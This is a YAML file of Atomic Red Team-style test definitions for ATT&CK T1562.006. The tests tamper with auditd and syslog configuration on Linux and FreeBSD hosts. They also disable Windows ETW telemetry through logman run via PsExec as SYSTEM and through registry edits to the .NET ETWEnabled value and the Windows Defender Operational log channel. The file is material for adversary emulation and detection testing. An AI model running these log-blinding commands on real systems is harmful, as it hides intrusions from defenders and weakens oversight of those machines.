Hare Sudhan 62a85c12b5 FreeBSD changes (#2585)
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00


# Atomic tests for ATT&CK T1562.006 (Impair Defenses: Indicator Blocking).
# Every entry below tampers with a host's audit/logging configuration and is
# expected to be reverted by its own cleanup_command.
attack_technique: T1562.006
display_name: "Impair Defenses: Indicator Blocking"
atomic_tests:
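- name: 'Auditing Configuration Changes on Linux Host'
  auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
  description: |
    Emulates modification of auditd configuration files
  supported_platforms:
  - linux
  input_arguments:
    audisp_config_file_name:
      description: The name of the audispd configuration file to be changed
      type: string
      default: audispd.conf
    auditd_config_file_name:
      description: The name of the auditd configuration file to be changed
      type: string
      default: auditd.conf
    libaudit_config_file_name:
      description: The name of the libaudit configuration file to be changed
      type: string
      default: libaudit.conf
  executor:
    # Every file is appended to only if it exists: /etc/audisp can be absent on
    # newer audit releases, and GNU sed -i errors out on a missing file instead
    # of skipping it. auditd.conf is looked up in /etc first, then /etc/audit.
    command: |
      if [ -f "/etc/audisp/#{audisp_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
      fi
      if [ -f "/etc/#{auditd_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
      elif [ -f "/etc/audit/#{auditd_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
      fi
      if [ -f "/etc/#{libaudit_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
      fi
    # Remove the marker line by content. Deleting the last line ('$ d') would
    # drop a real directive whenever the append did not happen (file missing)
    # or the file was edited between attack and cleanup.
    cleanup_command: |
      if [ -f "/etc/audisp/#{audisp_config_file_name}" ];
      then sed -i '/#art_test_1562_006_1/d' /etc/audisp/#{audisp_config_file_name}
      fi
      if [ -f "/etc/#{auditd_config_file_name}" ];
      then sed -i '/#art_test_1562_006_1/d' /etc/#{auditd_config_file_name}
      elif [ -f "/etc/audit/#{auditd_config_file_name}" ];
      then sed -i '/#art_test_1562_006_1/d' /etc/audit/#{auditd_config_file_name}
      fi
      if [ -f "/etc/#{libaudit_config_file_name}" ];
      then sed -i '/#art_test_1562_006_1/d' /etc/#{libaudit_config_file_name}
      fi
    name: bash
    elevation_required: true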
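- name: 'Auditing Configuration Changes on FreeBSD Host'
  auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
  description: |
    Emulates modification of auditd configuration files
  # Declared as linux (this commit renamed the platform from freebsd to linux),
  # but the executor relies on FreeBSD's /etc/security audit layout and on BSD
  # sed's `-i ""` form, which GNU sed does not accept.
  supported_platforms:
  - linux
  input_arguments:
    auditd_config_file_name:
      description: The name of the auditd configuration file to be changed
      type: string
      default: audit_event
  executor:
    # Append only when the file exists; an unguarded `>>` would create a stray
    # file that cleanup then empties but never removes.
    command: |
      if [ -f "/etc/security/#{auditd_config_file_name}" ];
      then echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
      fi
    # Delete the marker line by content so nothing else in the file is touched.
    cleanup_command: |
      if [ -f "/etc/security/#{auditd_config_file_name}" ];
      then sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
      fi
    name: sh
    elevation_required: true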
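- name: 'Logging Configuration Changes on Linux Host'
  auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
  description: |
    Emulates modification of syslog configuration.
  supported_platforms:
  - linux
  input_arguments:
    syslog_config_file_name:
      description: The name of the syslog configuration file to be changed
      type: string
      default: syslog.conf
    rsyslog_config_file_name:
      description: The name of the rsyslog configuration file to be changed
      type: string
      default: rsyslog.conf
    syslog_ng_config_file_name:
      description: The name of the syslog-ng configuration file to be changed
      type: string
      default: syslog-ng.conf
  executor:
    # Append a marker comment to whichever syslog implementation(s) are present;
    # each file is checked separately because a host commonly has only one.
    command: |
      if [ -f "/etc/#{syslog_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
      fi
      if [ -f "/etc/#{rsyslog_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
      fi
      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
      then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
      fi
    # Remove the marker line by content. Deleting the last line ('$ d') would
    # drop a real directive if the append did not happen (e.g. empty file, where
    # '$ a' is a no-op) or the file changed between attack and cleanup.
    cleanup_command: |
      if [ -f "/etc/#{syslog_config_file_name}" ];
      then sed -i '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
      fi
      if [ -f "/etc/#{rsyslog_config_file_name}" ];
      then sed -i '/#art_test_1562_006_2/d' /etc/#{rsyslog_config_file_name}
      fi
      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
      then sed -i '/#art_test_1562_006_2/d' /etc/syslog-ng/#{syslog_ng_config_file_name}
      fi
    name: bash
    elevation_required: true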
- name: "Logging Configuration Changes on FreeBSD Host"
  auto_generated_guid: "6b8ca3ab-5980-4321-80c3-bcd77c8daed8"
  description: |
    Emulates modification of syslog configuration.
  # Platform is linux (renamed from freebsd in this commit); the cleanup uses the
  # BSD sed `-i ""` form, so it is only expected to work on a FreeBSD host.
  supported_platforms:
  - linux
  input_arguments:
    syslog_config_file_name:
      description: "The name of the syslog configuration file to be changed"
      type: "string"
      default: "syslog.conf"
  executor:
    # Append a marker comment to syslog.conf when the file is present.
    command: |
      if [ -f "/etc/#{syslog_config_file_name}" ];
      then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
      fi
    # Remove the marker line by content; nothing else in the file is touched.
    cleanup_command: |
      if [ -f "/etc/#{syslog_config_file_name}" ];
      then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
      fi
    name: "sh"
    elevation_required: true
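- name: Disable Powershell ETW Provider - Windows
  auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
  description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
  supported_platforms:
  - windows
  input_arguments:
    ps_exec_location:
      description: Location of PSExec.
      type: string
      default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
    session:
      description: The session to disable.
      type: string
      default: EventLog-Application
    provider:
      description: The provider to disable.
      type: string
      default: Microsoft-Windows-Powershell
  dependency_executor_name: powershell
  dependencies:
  - description: PSExec must be installed on the machine.
    prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
    # The archive is fetched over HTTPS but its contents are not checksum- or
    # signature-verified before being unpacked into the shared payload folder.
    get_prereq_command: |-
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
      expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
  executor:
    # PsExec -s runs logman as SYSTEM; "--p" removes the provider from the
    # session and "-p" (cleanup) adds it back.
    command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
    # -accepteula on cleanup too, so a cleanup run on its own (before the attack
    # command ever accepted the EULA on this host) cannot block on the prompt.
    cleanup_command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
    name: powershell
    elevation_required: true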
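- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
  auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
  description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
  supported_platforms:
  - windows
  executor:
    # /f overwrites an existing value silently; without it reg.exe asks
    # "overwrite (Yes/No)?" when ETWEnabled already exists and a
    # non-interactive run hangs on the prompt.
    command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0 /f
    # Deletes the value rather than restoring a previous one: if ETWEnabled was
    # deliberately set on this host before the test, that setting is lost.
    cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
    name: command_prompt
    elevation_required: true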
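- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
  auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
  description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
  supported_platforms:
  - windows
  executor:
    # -Force overwrites an existing ETWEnabled value without prompting.
    command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
    # Native cmdlet instead of shelling out to reg.exe, matching the other
    # PowerShell tests in this file; the value is removed, not restored, so a
    # pre-existing ETWEnabled setting on the host is lost.
    cleanup_command: Remove-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true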
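- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
  auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
  description: |
    An adversary can disable the ETW Provider of Windows Defender,
    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
  supported_platforms:
  - windows
  executor:
    # Sets the channel's Enabled value to 0; /f overwrites without prompting.
    command: |
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
    # Restore the channel to enabled (its default state on a stock install)
    # rather than deleting the value, so Defender logging is known to be back
    # on after cleanup. Events from the disabled window are not recoverable.
    cleanup_command: |
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 1 /f >nul 2>&1
    name: command_prompt
    elevation_required: true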
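- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
  auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
  description: |
    An adversary can disable the ETW Provider of Windows Defender,
    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
  supported_platforms:
  - windows
  executor:
    # Sets the channel's Enabled value to 0; -Force overwrites an existing value.
    command: |
      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
    # Restore the channel to enabled (its default state on a stock install)
    # rather than removing the value, so Defender logging is known to be back
    # on after cleanup. Events from the disabled window are not recoverable.
    cleanup_command: |
      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 1 -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true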